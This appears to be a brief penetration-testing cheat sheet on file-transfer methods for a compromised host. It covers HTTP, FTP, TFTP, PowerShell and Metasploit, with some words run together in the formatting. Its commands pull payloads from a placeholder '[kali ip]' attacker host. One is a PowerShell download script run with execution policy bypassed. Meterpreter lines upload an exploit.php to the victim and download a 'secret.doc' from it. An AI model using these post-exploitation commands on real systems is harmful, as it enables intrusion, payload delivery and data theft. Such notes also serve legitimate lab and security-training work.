Common File Transfers Method
Http
- Use
nginx/apachefor the service
FTP
-
setup ftp server by python-pyftpdlib
cd /var/yourdir
python -m python-pyftpdlib -p 21
-
Windows or Linux both acceptable
echo open [kali ip] 21> ftp.txt
echo USER anonymous>> ftp.txt # username
echo pass>> ftp.txt # password
echo bin>> ftp.txt # binary mode
echo GET [file]>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
TFTP
Windows XP, 2003
Windows 7 or later need to be installed manually.
Attack side
mkdir /tftp
atftpd –daemon –port 69 /tftpvictim
tftp -i $SrcIP get $filePath
Linux
wgetcurlftp
Windows
ftppowershell
echo $storageDir = $pwd >wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = “http://[kali ip]/[file]” >>wget.ps1
echo $file = “[file]” >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Metasploit
need to get shell on the machine first
then use
meterpreterbysessionscommandupload /var/www/html/exploit.php c:\Users\IEUser\exploit.php
download c:\Users\IEUser\secret.doc /var/www/html/secret.doc